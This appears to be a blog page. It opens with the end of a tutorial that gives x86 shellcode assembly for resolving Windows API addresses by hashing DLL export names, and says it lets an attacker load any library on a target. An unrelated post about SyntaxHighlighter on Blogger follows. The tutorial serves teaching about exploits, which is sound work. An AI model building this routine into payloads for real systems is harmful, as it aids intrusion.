The code begins by saving the registers and finding the export table (IMAGE_EXPORT_DIRECTORY). This is accomplished by the following instructions:

find_function:
pushad                       ;Save registers
mov  ebp, [esp + 0x24]       ;Put first argument (dll base) into ebp
mov  eax, [ebp + 0x3c]       ;Put offset of PE header into eax
mov  edx, [ebp + eax + 0x78] ;Put offset of export directory into edx
add  edx, ebp                ;Offset + base = absolute address

Now EDX contains the absolute address in memory for the IMAGE_EXPORTS_DIRECTORY structure.
Next the number of names is put into ECX and the address of the names address table into EBX:

mov   ecx, [edx + 0x18]  ;Number of names
mov   ebx, [edx + 0x20]  ;Offset of names table
add   ebx, ebp           ;Adding EBP makes address absolute

Now ECX contains the number of exported symbols and EBX contains the address of the array of name offsets. Now we enter a loop which iterates backward through all exported names, hashing each name and comparing it to the requested value.

A C version of the hashing algorithm would look like this:

#define ROR(v,n) (((v)>>((n)%32))|((v)<<(32-((n)%32))))
char * name = "LoadLibraryA";
unsigned int hash = 0;
while (*name) {
    hash = ROR(hash, 13) + *name;
    name++;
}

The code goes like this:

find_function_loop:
jecxz find_function_finished ;No more names, go to end
dec   ecx                    ;Decrement ECX
mov   esi, [ebx + ecx * 4]   ;Offset of next exported name
add   esi, ebp               ;Make it absolute

compute_hash:
xor   edi, edi               ;EDI will contain calculated hash
xor   eax, eax               ;AL will contain character...zero top bits
cld                          ;Make lodsb increment esi

compute_hash_again:
lodsb                        ;Put char at ESI into AL and increment ESI
test  al, al                 ;Reached end of string ?
jz    compute_hash_finished  ;Yes we did
                             ;End hashing and start comparing
ror   edi, 0xd               ;Right shift 13 bits
add   edi, eax               ;Add character
jmp   compute_hash_again     ;Again with next character

compute_hash_finished:
cmp   edi, [esp + 0x28]      ;Compare computed hash with second arg
jnz   find_function_loop     ;Not equal...try next name

mov   ebx, [edx + 0x24]      ;Found! Put offset of ordinals into EBX
add   ebx, ebp               ;Make it absolute
mov   cx, [ebx + 2 * ecx]    ;Put ordinal in CX
                             ;ECX contains index of name which
                             ;corresponds to the index into the ordinal
                             ;table. Each ordinal is two bytes long

mov   ebx, [edx + 0x1c]      ;Put offset of function table into EBX
add   ebx, ebp               ;Make it absolute
mov   eax, [ebx + 4 * ecx]   ;Use ordinal as index into function table
                             ;and put offset of function into EAX
add   eax, ebp               ;Make it absolute

mov   [esp + 0x1c], eax      ;Overwrite the saved EAX register
                             ;with the found address

find_function_finished:
popad                        ;Restore registers
ret                          ;Return with EAX=absolute address of function

The code is pretty clear when you can visualize the structures. With these two shellcodes you can build more or less anything since you can load any library on the target machine and utilize its functionality.

Enjoy

Wednesday, June 6, 2012

First post

So...my first blog post.

I had hoped to write about how awesome I am or some cool project I am working on, but no. All my projects need code which needs syntax highlighting and I cannot seem to get it working so instead I will write about how badly I am failing at making this work.

So, a code blog needs syntax highlighting and a Google query showed me that SyntaxHighlighter by Alex Gorbatchev is the way to go. It is using JavaScript/HTML and CSS for highlighting on the client so no server side code is needed. Cool.

And there is even lots of integration guides telling you how to make it work on many different blogging sites and CMSes so what can go wrong?

Well I succeeded in doing something wrong...it ain't working.

Blogger has disabled the 'Edit HTML' button for editing the template for some reason. Another quick Google search offered me the solution, so I have added the CSS links and JavaScript source files that the many guides told me.

So I added a first (now deleted) blog post with some testing code:

<pre class="brush:c">
#include <stdio.h>

int main(int argc, const char * argv[]) {
    printf("Hello, World!\n");
    return 0;
}
</pre>

But for some reason it didn't work. The code was just shown plain, simple and boring as with a normal <pre>. Why?

Viewing the source revealed that the scripts were in place. Pressing F12 in Google Chrome showed me that the files were in fact downloaded. A breakpoint on the JavaScript showed me that the code was run and the debugger tells me that no exceptions are thrown and everything is just fine. So why wasn't it working?

Well...apparently Blogger uses Ajax for retrieving the blog post text and then inserts it into the page. This happens AFTER the JavaScript has run so of course SyntaxHighlighter cannot format my code. It isn't there yet!

I press F12 again and run 'SyntaxHighlighter.all();'  from the console. Nothing happens!

Maybe SyntaxHighlighter doesn't like being called twice so I commented out the 'SyntaxHighlighter.all();' call from the template and ran it again manually. Still nothing!

Maybe there is an error in SyntaxHighlighter, so I create a static test page on my machine which loads all the files and contains a code snippet. To my dismay it looks fine and well highlighted.

This is where I am now. Failing!
Or maybe Blogger is...I really cannot tell but life must go on so I archive this issue in my "technical debt" tray for later. Code snippets will look like crap until I (or someone else) resolve this issue.

So much for looking cool in my first post.